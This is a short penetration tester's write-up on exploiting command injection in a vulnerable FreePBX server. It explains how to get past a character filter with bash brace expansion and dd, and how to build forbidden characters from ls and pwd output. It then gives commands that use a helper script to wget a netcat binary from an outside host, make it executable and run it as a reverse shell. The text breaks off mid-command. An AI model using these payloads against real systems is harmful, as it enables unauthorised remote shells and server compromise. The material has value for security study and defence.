FreePBX Exploit and Brace Expansion

January 2017

During one penetration test, I stumbled upon a server running a vulnerable version of FreePBX. I tried a couple of exploits, but most of them did not work. The only exploit that worked was this curl command.

To make running commands easier, I wrote a simple Python script.

Usage of the script: python freepbx.py <server> <command>.

How it works

The developers attempted to prevent shell command injection by performing simple, yet inadequate, sanitization. Special chars were filtered, and thus I could not run nc -nv <ip> <port> or echo aaa > file.txt. I could only use one-word commands.

How can I use the exploit if I can not use spaces? It turned out, it is possible to run commands without spaces by using {ls,-l} syntax, which is called brace expansion. Brace expansion is a mechanism by which arbitrary strings can be generated in Linux. It is similar to filename expansion. For example, echo a{d,c,b}e would produce three strings — ade, ace, and abe.

I needed to write files, but I could not use / or \. The workaround was to use a command echo "Hello world" | dd of=test.txt where of stands for Output File.

Then I needed to get a reverse shell, but I could not use dots and slashes. However, I could run commands, write files, and use command substitution. Therefore, I could run the following command to get a dot symbol:

python freepbx.py <server> "ls|{head,-n,1}|{cut,-c,5}|{dd,of=dot}"

This command writes a dot symbol into a file from ls output. The dot happened to be the 5th symbol of the first file in this particular case.

Then I repeated the same process for the slash symbol, but this time I generated it from pwd command output like this:

freepbx.py <server> "{pwd,}|{cut,-c,1}|{dd,of=slash}"

Now it was possible to get reverse shell:

python freepbx.py <server> "{wget,exgq\$({cat,dot})pw\$({cat,slash})nc}"
python freepbx.py <server> "{chmod,+x,nc}"
python freepbx.py <server> "{\$({cat,dot})\$({cat,slash})nc,exgq\$({cat,dot})pw